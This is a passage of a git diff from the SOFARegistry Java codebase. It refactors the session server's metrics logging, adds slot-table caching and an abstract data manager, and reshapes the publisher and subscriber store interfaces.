LoggerFactory.getLogger( - "SESSION-PROFILE-DIGEST", "[TaskExecute]"); - - private static final Logger EXE_LOGGER = LoggerFactory.getLogger( - "SESSION-PROFILE-DIGEST", - "[ExecutorMetrics]"); - - public static final String SYMBOLIC1 = " ├─ "; - public static final String SYMBOLIC2 = " └─ "; - - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; - - /** - * store watchers - */ - @Autowired - private Watchers sessionWatchers; - - /** - * store publishers - */ - @Autowired - private DataStore sessionDataStore; - - @Autowired - private ExecutorManager executorManager; - - @Autowired - private TaskListener receivedDataMultiPushTaskListener; - - @Scheduled(initialDelayString = "${session.server.syncHeartbeat.fixedDelay}", fixedDelayString = "${session.server.syncHeartbeat.fixedDelay}") - public void syncCounte() { - long countSub = sessionInterests.count(); - long countPub = sessionDataStore.count(); - long countSubW = sessionWatchers.count(); - - CONSOLE_COUNT_LOGGER.info("Subscriber count: {}, Publisher count: {}, Watcher count: {},", - countSub, countPub, countSubW); - } + private static final Logger CONSOLE_COUNT_LOGGER = + LoggerFactory.getLogger("SESSION-CONSOLE", "[Count]"); - @Scheduled(initialDelayString = "${session.server.printTask.fixedDelay}", fixedDelayString = "${session.server.printTask.fixedDelay}") - public void printTaskExecute() { + private static final Logger PRO_LOGGER = + LoggerFactory.getLogger("SESSION-PROFILE-DIGEST", "[TaskExecute]"); - Map taskDispatcherMap = TaskDispatchers.getTaskDispatcherMap(); - if (taskDispatcherMap != null) { + private static final Logger EXE_LOGGER = + LoggerFactory.getLogger("SESSION-PROFILE-DIGEST", "[ExecutorMetrics]"); - StringBuilder sb = new StringBuilder(); - logInfo(sb, taskDispatcherMap, "TaskDispatcher"); - PRO_LOGGER.info(sb.toString()); - } + public static final String SYMBOLIC1 = " ├─ "; + public static final String SYMBOLIC2 = " └─ "; - } + @Autowired Exchange boltExchange; - protected void logInfo(StringBuilder sb0, Map taskDispatcherMap, - String info) { - sb0.append("\n").append(info).append(" >>>>>>>"); - StringBuilder sb = new StringBuilder(); - for (Iterator> i = taskDispatcherMap.entrySet().iterator(); i - .hasNext();) { - Entry entry = i.next(); - AcceptorExecutor acceptorExecutor = entry.getValue().getAcceptorExecutor(); - String outterTreeSymbol = SYMBOLIC1; - if (!i.hasNext()) { - outterTreeSymbol = SYMBOLIC2; - } - sb.append(outterTreeSymbol).append(entry.getKey()); - sb.append(", AcceptedTasks:").append(acceptorExecutor.getAcceptedTasks()); - sb.append(", ReplayedTasks:").append(acceptorExecutor.getReplayedTasks()); - sb.append(", QueueOverflows:").append(acceptorExecutor.getQueueOverflows()); - sb.append(" ,PendingTaskSize:").append(acceptorExecutor.getPendingTaskSize()); - sb.append(", ExpiredTasks:").append(acceptorExecutor.getExpiredTasks()); - sb.append(", OverriddenTasks:").append(acceptorExecutor.getOverriddenTasks()); - sb.append(", MaxBuffer:").append(acceptorExecutor.getMaxBufferSize()).append("\n"); - } - sb0.append("\n").append(sb); - } + @Autowired SessionServerConfig sessionServerConfig; + + /** store subscribers */ + @Autowired Interests sessionInterests; - @Scheduled(initialDelayString = "${session.server.printTask.fixedDelay}", fixedDelayString = "${session.server.printTask.fixedDelay}") - public void printExecutorTaskExecute() { + /** store watchers */ + @Autowired Watchers sessionWatchers; - Map reportExecutors = executorManager.getReportExecutors(); - if (reportExecutors != null) { + /** store publishers */ + @Autowired DataStore sessionDataStore; - StringBuilder sb = new StringBuilder(); - logInfoExecutor(sb, reportExecutors, "ExecutorMetrics"); - EXE_LOGGER.info(sb.toString()); - } + @Autowired ExecutorManager executorManager; + @Scheduled( + initialDelayString = "${session.server.syncHeartbeat.fixedDelay}", + fixedDelayString = "${session.server.syncHeartbeat.fixedDelay}") + public void syncCount() { + long countSub = sessionInterests.count(); + long countPub = sessionDataStore.count(); + long countSubW = sessionWatchers.count(); + + int channelCount = 0; + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + if (sessionServer != null) { + channelCount = sessionServer.getChannelCount(); } - protected void logInfoExecutor(StringBuilder sb0, Map reportExecutors, String info) { - sb0.append("\n").append(info).append(" >>>>>>>"); - StringBuilder sb = new StringBuilder(); - for (Iterator> i = reportExecutors.entrySet().iterator(); i.hasNext(); ) { - Entry entry = i.next(); - String executorName = entry.getKey(); - - MetricRegistry metricRegistry = TaskMetrics.getInstance().getMetricRegistry(); - Map map = metricRegistry.getGauges((name, value) -> name.startsWith(executorName)); - - String outterTreeSymbol = SYMBOLIC1; - if (!i.hasNext()) { - outterTreeSymbol = SYMBOLIC2; - } - sb.append(outterTreeSymbol).append(executorName); - map.forEach((key, gauge) -> { - String name = key.substring(executorName.length() + 1); - sb.append(", ").append(name).append(":").append(gauge.getValue()); - }); - sb.append("\n"); - } - sb0.append("\n").append(sb); + CONSOLE_COUNT_LOGGER.info( + "Subscriber count: {}, Publisher count: {}, Watcher count: {}, Connection count: {}", + countSub, + countPub, + countSubW, + channelCount); + } + + @Scheduled( + initialDelayString = "${session.server.printTask.fixedDelay}", + fixedDelayString = "${session.server.printTask.fixedDelay}") + public void printTaskExecute() { + + Map taskDispatcherMap = TaskDispatchers.getTaskDispatcherMap(); + if (taskDispatcherMap != null) { + + StringBuilder sb = new StringBuilder(); + logInfo(sb, taskDispatcherMap, "TaskDispatcher"); + PRO_LOGGER.info(sb.toString()); + } + } + + protected void logInfo( + StringBuilder sb0, Map taskDispatcherMap, String info) { + sb0.append("\n").append(info).append(" >>>>>>>"); + StringBuilder sb = new StringBuilder(); + for (Iterator> i = taskDispatcherMap.entrySet().iterator(); + i.hasNext(); ) { + Entry entry = i.next(); + AcceptorExecutor acceptorExecutor = entry.getValue().getAcceptorExecutor(); + String outterTreeSymbol = SYMBOLIC1; + if (!i.hasNext()) { + outterTreeSymbol = SYMBOLIC2; + } + sb.append(outterTreeSymbol).append(entry.getKey()); + sb.append(", AcceptedTasks:").append(acceptorExecutor.getAcceptedTasks()); + sb.append(", ReplayedTasks:").append(acceptorExecutor.getReplayedTasks()); + sb.append(", QueueOverflows:").append(acceptorExecutor.getQueueOverflows()); + sb.append(" ,PendingTaskSize:").append(acceptorExecutor.getPendingTaskSize()); + sb.append(", ExpiredTasks:").append(acceptorExecutor.getExpiredTasks()); + sb.append(", OverriddenTasks:").append(acceptorExecutor.getOverriddenTasks()); + sb.append(", MaxBuffer:").append(acceptorExecutor.getMaxBufferSize()).append("\n"); } + sb0.append("\n").append(sb); + } - @Scheduled(initialDelayString = "${session.server.printTask.fixedDelay}", fixedDelayString = "${session.server.printTask.fixedDelay}") - public void printPushMultiTaskExecute() { - if (receivedDataMultiPushTaskListener instanceof ReceivedDataMultiPushTaskListener) { - ReceivedDataMultiPushTaskListener listener = (ReceivedDataMultiPushTaskListener) receivedDataMultiPushTaskListener; - StringBuilder sb = new StringBuilder(); - sb.append("ReceivedDataPush").append(" >>>>>>>"); - sb.append(", AcceptedTasks:").append( - listener.getTaskMergeProcessorStrategy().getPutTaskSize()); - sb.append(", SendTasks:").append( - listener.getTaskMergeProcessorStrategy().getSendTaskSize()); - sb.append(" ,PendingTaskSize:").append( - listener.getTaskMergeProcessorStrategy().getPendingTaskSize()); - sb.append(", OverriddenTasks:").append( - listener.getTaskMergeProcessorStrategy().getOverrideTaskSize()); - sb.append("\n"); - PRO_LOGGER.info(sb.toString()); - } + @Scheduled( + initialDelayString = "${session.server.printTask.fixedDelay}", + fixedDelayString = "${session.server.printTask.fixedDelay}") + public void printExecutorTaskExecute() { + + Map reportExecutors = executorManager.getReportExecutors(); + if (reportExecutors != null) { + + StringBuilder sb = new StringBuilder(); + logInfoExecutor(sb, reportExecutors, "ExecutorMetrics"); + EXE_LOGGER.info(sb.toString()); + } + } + + protected void logInfoExecutor( + StringBuilder sb0, Map reportExecutors, String info) { + sb0.append("\n").append(info).append(" >>>>>>>"); + StringBuilder sb = new StringBuilder(); + for (Iterator> i = reportExecutors.entrySet().iterator(); + i.hasNext(); ) { + Entry entry = i.next(); + String executorName = entry.getKey(); + + MetricRegistry metricRegistry = TaskMetrics.getInstance().getMetricRegistry(); + Map map = + metricRegistry.getGauges((name, value) -> name.startsWith(executorName)); + + String outterTreeSymbol = SYMBOLIC1; + if (!i.hasNext()) { + outterTreeSymbol = SYMBOLIC2; + } + sb.append(outterTreeSymbol).append(executorName); + map.forEach( + (key, gauge) -> { + String name = key.substring(executorName.length() + 1); + sb.append(", ").append(name).append(":").append(gauge.getValue()); + }); + sb.append("\n"); } + sb0.append("\n").append(sb); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCache.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCache.java new file mode 100644 index 000000000..b415f316e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCache.java @@ -0,0 +1,80 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 16:21 yuzhi.lyz Exp $ + */ +public interface SlotTableCache { + /** + * Slot of int. + * + * @param dataInfoId the data info id + * @return the int + */ + int slotOf(String dataInfoId); + + /** + * Gets get slot. + * + * @param dataInfoId the data info id + * @return the get slot + */ + Slot getSlot(String dataInfoId); + + /** + * Gets get slot. + * + * @param slotId the slot id + * @return the get slot + */ + Slot getSlot(int slotId); + + /** + * Gets get leader. + * + * @param slotId the slot id + * @return the get leader + */ + String getLeader(int slotId); + + /** + * Gets get epoch. + * + * @return the get epoch + */ + long getEpoch(); + + /** + * Update slot table boolean. + * + * @param slotTable the slot table + * @return the boolean + */ + boolean updateSlotTable(SlotTable slotTable); + + /** + * Gets get current slot table. + * + * @return the get current slot table + */ + SlotTable getCurrentSlotTable(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImpl.java new file mode 100644 index 000000000..601e302dc --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImpl.java @@ -0,0 +1,154 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunction; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-11 10:07 yuzhi.lyz Exp $ + */ +public final class SlotTableCacheImpl implements SlotTableCache { + private static final Logger LOGGER = LoggerFactory.getLogger(SlotTableCacheImpl.class); + + private final SlotFunction slotFunction = SlotFunctionRegistry.getFunc(); + + private volatile SlotTable slotTable = SlotTable.INIT; + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + @Autowired(required = false) + private List recorders; + + @Override + public int slotOf(String dataInfoId) { + return slotFunction.slotOf(dataInfoId); + } + + @Override + public Slot getSlot(String dataInfoId) { + int slotId = slotOf(dataInfoId); + lock.readLock().lock(); + try { + return slotTable.getSlot(slotId); + } finally { + lock.readLock().unlock(); + } + } + + @Override + public Slot getSlot(int slotId) { + lock.readLock().lock(); + try { + return slotTable.getSlot(slotId); + } finally { + lock.readLock().unlock(); + } + } + + @Override + public String getLeader(int slotId) { + lock.readLock().lock(); + try { + final Slot slot = slotTable.getSlot(slotId); + return slot == null ? null : slot.getLeader(); + } finally { + lock.readLock().unlock(); + } + } + + @Override + public long getEpoch() { + lock.readLock().lock(); + try { + return slotTable.getEpoch(); + } finally { + lock.readLock().unlock(); + } + } + + @Override + public boolean updateSlotTable(SlotTable slotTable) { + lock.writeLock().lock(); + final long curEpoch; + try { + curEpoch = this.slotTable.getEpoch(); + if (curEpoch >= slotTable.getEpoch()) { + LOGGER.info("skip update, current={}, update={}", curEpoch, slotTable.getEpoch()); + return false; + } + recordSlotTable(slotTable); + this.slotTable = slotTable; + } finally { + lock.writeLock().unlock(); + } + checkForSlotTable(curEpoch); + return true; + } + + private void recordSlotTable(SlotTable slotTable) { + if (recorders == null) { + return; + } + for (SlotTableRecorder recorder : recorders) { + if (recorder != null) { + recorder.record(slotTable); + } + } + } + + protected void checkForSlotTable(long curEpoch) { + for (Slot slot : this.slotTable.getSlots()) { + if (StringUtils.isBlank(slot.getLeader())) { + LOGGER.error("[NoLeader] {}", slot); + } + } + LOGGER.info( + "updating slot table, expect={}, current={}, {}", + slotTable.getEpoch(), + curEpoch, + this.slotTable); + } + + @Override + public SlotTable getCurrentSlotTable() { + lock.readLock().lock(); + try { + return new SlotTable(slotTable.getEpoch(), slotTable.getSlots()); + } finally { + lock.readLock().unlock(); + } + } + + @VisibleForTesting + protected SlotTableCacheImpl setRecorders(List recorders) { + this.recorders = recorders; + return this; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/AbstractDataManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/AbstractDataManager.java new file mode 100644 index 000000000..afc2b130c --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/AbstractDataManager.java @@ -0,0 +1,167 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import java.util.stream.Collectors; +import org.apache.commons.collections.MapUtils; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-18 17:18 yuzhi.lyz Exp $ + */ +public abstract class AbstractDataManager + implements DataManager { + private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); + protected final Lock read = readWriteLock.readLock(); + protected final Lock write = readWriteLock.writeLock(); + + protected final ConcurrentHashMap> stores = + new ConcurrentHashMap<>(); + protected final Logger logger; + + @Autowired protected SessionServerConfig sessionServerConfig; + + AbstractDataManager(Logger logger) { + this.logger = logger; + } + + protected T addData(T data) { + Map dataMap = + stores.computeIfAbsent(data.getDataInfoId(), k -> Maps.newConcurrentMap()); + + T existing = dataMap.put(data.getRegisterId(), data); + return existing; + } + + @Override + public boolean deleteById(String registerId, String dataInfoId) { + Map dataMap = stores.get(dataInfoId); + if (CollectionUtils.isEmpty(dataMap)) { + logger.warn("Delete but not registered, {}", dataInfoId); + return false; + } + T dataToDelete = dataMap.remove(registerId); + + if (dataToDelete == null) { + logger.warn("Delete but not registered, {}, {}", dataInfoId, registerId); + } + return dataToDelete != null; + } + + @Override + public Map deleteByConnectId(ConnectId connectId) { + Map ret = Maps.newHashMap(); + + for (Map map : stores.values()) { + // copy a map for iterate + for (Map.Entry e : Maps.newHashMap(map).entrySet()) { + final T data = e.getValue(); + if (connectId.equals(data.connectId())) { + // may be the value has removed by anther thread + if (map.remove(e.getKey(), data)) { + ret.put(e.getKey(), data); + } + } + } + } + return ret; + } + + @Override + public Collection getDatas(String dataInfoId) { + ParaCheckUtil.checkNotBlank(dataInfoId, "dataInfoId"); + Map dataMap = stores.get(dataInfoId); + if (MapUtils.isEmpty(dataMap)) { + return Collections.emptyList(); + } + return Lists.newArrayList(dataMap.values()); + } + + @Override + public Map> getDatas() { + return StoreHelpers.copyMap((Map) stores); + } + + @Override + public List getDataList() { + List ret = new ArrayList<>(512); + for (Map store : stores.values()) { + ret.addAll(store.values()); + } + return ret; + } + + @Override + public Map queryByConnectId(ConnectId connectId) { + return StoreHelpers.getByConnectId(connectId, stores); + } + + @Override + public T queryById(String registerId, String dataInfoId) { + final Map datas = stores.get(dataInfoId); + return datas == null ? null : datas.get(registerId); + } + + @Override + public long count() { + return StoreHelpers.count(stores); + } + + @Override + public Set getConnectIds() { + return StoreHelpers.collectConnectIds(stores); + } + + @Override + public Set collectProcessIds() { + return StoreHelpers.collectProcessIds(stores); + } + + @Override + public Collection getDataInfoIds() { + return stores.entrySet().stream() + .filter(e -> !(e.getValue().isEmpty())) + .map(e -> e.getKey()) + .collect(Collectors.toSet()); + } + + public SessionServerConfig getSessionServerConfig() { + return sessionServerConfig; + } + + /** + * Setter method for property sessionServerConfig. + * + * @param sessionServerConfig value to be assigned to property sessionServerConfig + */ + public void setSessionServerConfig(SessionServerConfig sessionServerConfig) { + this.sessionServerConfig = sessionServerConfig; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataManager.java index 5ec0bce95..5afc8ed66 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataManager.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataManager.java @@ -16,57 +16,73 @@ */ package com.alipay.sofa.registry.server.session.store; +import com.alipay.sofa.registry.common.model.ConnectId; +import java.util.Collection; +import java.util.List; import java.util.Map; +import java.util.Set; /** * Session Data store manager,according base data function * - * Session Data struct + *

Session Data struct * - * - DataInfo ID - * | - * - Publisher List - * | - * - Subscriber List + *

- DataInfo ID | - Publisher List | - Subscriber List * * @author shangyu.wh * @version $Id: DataManager.java, v 0.1 2017-11-30 17:57 shangyu.wh Exp $ */ public interface DataManager { - /** - * new publisher and subscriber data add - * - * @param data - */ - void add(DATA data); + /** + * new publisher and subscriber data add + * + * @param data + */ + boolean add(DATA data); - /** - * remove single data by register id - * @param registerId - * @param dataInfoId - * @return - */ - boolean deleteById(ID registerId, DATAINFOID dataInfoId); + /** + * query data by client node connectId + * + * @param connectId + * @return + */ + Map queryByConnectId(ConnectId connectId); - /** - * query data by client node connectId - * - * @param connectId - * @return - */ - Map queryByConnectId(String connectId); + /** + * remove data by client node connectId + * + * @param connectId + */ + Map deleteByConnectId(ConnectId connectId); - /** - * remove data by client node connectId - * - * @param connectId - */ - boolean deleteByConnectId(String connectId); + DATA queryById(ID registerId, DATAINFOID dataInfoId); - /** - * count pub and sub number - * @return - */ - long count(); -} \ No newline at end of file + /** + * remove single data by register id + * + * @param registerId + * @param dataInfoId + * @return + */ + boolean deleteById(ID registerId, DATAINFOID dataInfoId); + + /** + * count pub and sub number + * + * @return + */ + long count(); + + Set getConnectIds(); + + Collection getDatas(DATAINFOID dataInfoId); + + List getDataList(); + + Map> getDatas(); + + Set collectProcessIds(); + + Collection getDataInfoIds(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataStore.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataStore.java index 2b1fe2970..5236cefde 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataStore.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/DataStore.java @@ -17,18 +17,14 @@ package com.alipay.sofa.registry.server.session.store; import com.alipay.sofa.registry.common.model.store.Publisher; - -import java.util.Collection; +import java.util.Map; /** - * * @author shangyu.wh * @version $Id: DataStore.java, v 0.1 2017-12-01 18:13 shangyu.wh Exp $ */ public interface DataStore extends DataManager { - Collection getStoreDataByDataInfoId(String dataInfoId); - - Publisher queryById(String registerId, String dataInfoId); - -} \ No newline at end of file + Map> getDataInfoIdPublishers( + int slotId); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Interests.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Interests.java index 3fcf99a39..9909c3616 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Interests.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Interests.java @@ -16,65 +16,44 @@ */ package com.alipay.sofa.registry.server.session.store; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.core.model.ScopeEnum; - -import java.net.InetSocketAddress; import java.util.Collection; import java.util.Map; /** - * * @author shangyu.wh * @version $Id: SessionInterests.java, v 0.1 2017-11-30 15:53 shangyu.wh Exp $ */ public interface Interests extends DataManager { - /** - * query subscribers by dataInfoID - * - * @param dataInfoId - * @return - */ - Collection getInterests(String dataInfoId); - - /** - * check subscribers interest dataInfoId version,very dataCenter dataInfoId version different - * if return false - * else check return bigger version - * - * @param dataCenter - * @param dataInfoId - * @param version - * @return - */ - boolean checkInterestVersions(String dataCenter, String dataInfoId, Long version); - - /** - * check subscribers interest dataInfoId version,very dataCenter dataInfoId version different - * if not exist add - * else check and update big version - * - * @param dataCenter - * @param dataInfoId - * @param version - * @return - */ - boolean checkAndUpdateInterestVersions(String dataCenter, String dataInfoId, Long version); - - /** - * get all subscriber dataInfoIds - * - * @return - */ - Collection getInterestDataInfoIds(); - - /** - * get subscribers whith specify dataInfo and scope,and order by source InetSocketAddress - * @param dataInfoId - * @param scope - * @return - */ - Map> querySubscriberIndex(String dataInfoId, - ScopeEnum scope); -} \ No newline at end of file + /** + * check subscribers interest dataInfoId version,very dataCenter dataInfoId version different if + * return false else check return bigger version + * + * @param dataCenter + * @param datumDataInfoId + * @param version + * @return + */ + InterestVersionCheck checkInterestVersion( + String dataCenter, String datumDataInfoId, long version); + + Collection getInterests(String datumDataInfoId); + + Map getInterestVersions(String dataCenter); + + Collection getInterestsNeverPushed(); + + enum InterestVersionCheck { + NoSub(false), + Obsolete(false), + Interested(true), + ; + public final boolean interested; + + private InterestVersionCheck(boolean Interested) { + this.interested = Interested; + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/ReSubscribers.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/ReSubscribers.java deleted file mode 100644 index 7bd3460fd..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/ReSubscribers.java +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.store; - -import com.alipay.sofa.registry.common.model.store.Subscriber; - -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: ReSubscribers.java, v 0.1 2018-08-13 22:23 shangyu.wh Exp $ - */ -public interface ReSubscribers { - - void addReSubscriber(Subscriber subscriber); - - boolean deleteReSubscriber(Subscriber subscriber); - - Map> getReSubscribers(); - - void clearReSubscribers(); -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionDataStore.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionDataStore.java index 080e46bd8..03b179a98 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionDataStore.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionDataStore.java @@ -16,235 +16,65 @@ */ package com.alipay.sofa.registry.server.session.store; +import com.alipay.sofa.registry.common.model.PublisherUtils; import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; - -import java.util.Collection; -import java.util.Iterator; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Maps; import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; /** - * * @author shangyu.wh * @version $Id: SessionDataStore.java, v 0.1 2017-12-01 18:14 shangyu.wh Exp $ */ -public class SessionDataStore implements DataStore { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionDataStore.class); - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock write = readWriteLock - .writeLock(); - - /** - * publisher store - */ - private Map> registry = new ConcurrentHashMap<>(); - - private Map> connectIndex = new ConcurrentHashMap<>(); - - @Override - public void add(Publisher publisher) { - - write.lock(); - try { - Map publishers = registry.get(publisher.getDataInfoId()); - - if (publishers == null) { - ConcurrentHashMap newmap = new ConcurrentHashMap<>(); - publishers = registry.putIfAbsent(publisher.getDataInfoId(), newmap); - if (publishers == null) { - publishers = newmap; - } - } - - Publisher existingPublisher = publishers.get(publisher.getRegisterId()); - - if (existingPublisher != null) { - - if (existingPublisher.getVersion() != null) { - long oldVersion = existingPublisher.getVersion(); - Long newVersion = publisher.getVersion(); - if (newVersion == null) { - LOGGER.error("There is publisher input version can't be null!"); - return; - } else if (oldVersion > newVersion) { - LOGGER - .warn( - "There is publisher already exists,but old version {} higher than input {},it will not be overwrite! {}", - oldVersion, newVersion, existingPublisher); - return; - } else if (oldVersion == newVersion) { - Long newTime = publisher.getRegisterTimestamp(); - long oldTime = existingPublisher.getRegisterTimestamp(); - if (newTime == null) { - LOGGER - .error("There is publisher input Register Timestamp can not be null!"); - return; - } - if (oldTime > newTime) { - LOGGER - .warn( - "There is publisher already exists,but old timestamp {} higher than input {},it will not be overwrite! {}", - oldTime, newTime, existingPublisher); - return; - } - } - } - LOGGER - .warn( - "There is publisher already exists,version:{},it will be overwrite!Input version:{},info:{}", - existingPublisher.getVersion(), publisher.getVersion(), existingPublisher); - } - publishers.put(publisher.getRegisterId(), publisher); - - addIndex(publisher); - - } finally { - write.unlock(); - } - } - - @Override - public boolean deleteById(String registerId, String dataInfoId) { - - write.lock(); - try { - Map publishers = registry.get(dataInfoId); - - if (publishers == null) { - LOGGER.error( - "Delete failed because publisher is not registered for dataInfoId: {}", - dataInfoId); - return false; - } else { - Publisher publisherTodelete = publishers.remove(registerId); - - if (publisherTodelete == null) { - LOGGER.error( - "Delete failed because publisher is not registered for registerId: {}", - registerId); - return false; - - } else { - removeIndex(publisherTodelete); - return true; - } - } - } finally { - write.unlock(); - } - } - - @Override - public Map queryByConnectId(String connectId) { - return connectIndex.get(connectId); - } - - @Override - public boolean deleteByConnectId(String connectId) { - - write.lock(); - try { - for (Map map : registry.values()) { - for (Iterator it = map.values().iterator(); it.hasNext();) { - Publisher publisher = (Publisher) it.next(); - if (publisher != null - && connectId.equals(publisher.getSourceAddress().getAddressString())) { - it.remove(); - invalidateIndex(publisher); - } - } - } - return true; - } catch (Exception e) { - LOGGER.error("Delete publisher by connectId {} error!", connectId, e); - return false; - } finally { - write.unlock(); - } - } - - @Override - public Collection getStoreDataByDataInfoId(String dataInfoId) { - - Map publishers = registry.get(dataInfoId); - - if (publishers == null) { - LOGGER.info("There is not registered publisher for dataInfoId: {}", dataInfoId); - return null; - } else { - return publishers.values(); - } - } - - @Override - public Publisher queryById(String registerId, String dataInfoId) { - - Map publishers = registry.get(dataInfoId); - - if (publishers == null) { - LOGGER.error("Publisher is not registered for dataInfoId: {}", dataInfoId); - return null; - } - return publishers.get(registerId); - } - - @Override - public long count() { - AtomicLong count = new AtomicLong(0); - for (Map map : registry.values()) { - count.addAndGet(map.size()); - } - return count.get(); - } - - private void addIndex(Publisher publisher) { - - addConnectIndex(publisher); - } - - private void addConnectIndex(Publisher publisher) { - - String connectId = 